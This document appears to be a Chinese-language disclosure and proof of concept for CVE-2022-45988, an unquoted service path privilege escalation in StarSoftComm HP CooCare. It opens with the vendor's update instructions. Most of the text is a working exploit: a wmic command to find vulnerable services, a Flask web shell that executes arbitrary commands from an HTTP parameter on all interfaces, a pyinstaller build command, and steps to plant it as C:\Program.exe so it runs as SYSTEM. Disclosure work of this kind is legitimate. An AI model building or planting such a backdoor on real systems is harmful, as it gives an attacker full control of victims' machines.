################################################## ##
我已经联系了 hp-security-alert 他们已经修复了这个错误。关于 StarSoftComm CooCare [HP-PSRT-IR #4106]
供应商回复了以下信息:
请按照以下步骤更新:
推出电子服务
等待约3分钟
关闭并再次启动 eService。
检查版本是 v5.364 或更高版本。
#####################################
StarSoftComm HP CooCare 中存在提权漏洞,攻击者可以利用该漏洞提升其特权级别e管家超级版是HP Star14 pro自带的一款远程诊断软件,该软件为StarSoftComm(软件科技)旗下产品
在 windows 11 上测试 22621.819 HP LAPTOP HP Pavilion Plus 14 英寸笔记本电脑 14-eh0000 (56D77AV)
受影响版本:CooCare v5.364 以下
#漏洞复现
#第一步:wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """ 查找服务(使用上记CMD命令找到未引用的服务)
服务名称是 Windows Application Management Service = AKA = WinAppMgmt
服务的名称叫做Windows Application Management Service 简称是WinAppMgmt
该服务来自 StarSoftComm CooCare
#Step 2:准备恶意程序
from flask import Flask, request
import os
app = Flask(__name__)
@app.route('/')
def hello_world():
r = request.args.getlist('cmd') #Reception? cmd= parameter
a=os.popen(r[0]) #Execute system commands
l = a.read()
return l #return
if __name__ == '__main__':
app.run(host='0.0.0.0', port=14145, debug=True) #Listen HTTP port 14145
我是用python3 flask写的一个恶意exe,可以监听HTTP 14145端口,执行系统命令。
使用命令 pyinstaller.exe --onefile --windowed -F -w python_test.py 生成恶意 exe。
#Step 3:将恶意软件放入路径C:\并将恶意软件重命名为Program.exe
#Step 4:启动Windows应用管理服务
如果Windows Application Management Service已经启动,您可以重新启动它
#Step 5:等待Windows Application Management Service启动并执行系统命令 C:\Program.exe run as system
当我看到 Windows 应用程序管理服务在 Taskmgr.exe whit SYSTEM 中启动时,然后我可以打开浏览器输入http://127.0.0.1:14145?cmd=whoami
等待..........
项目地址:https://github.com/happy0717/CVE-2022-45988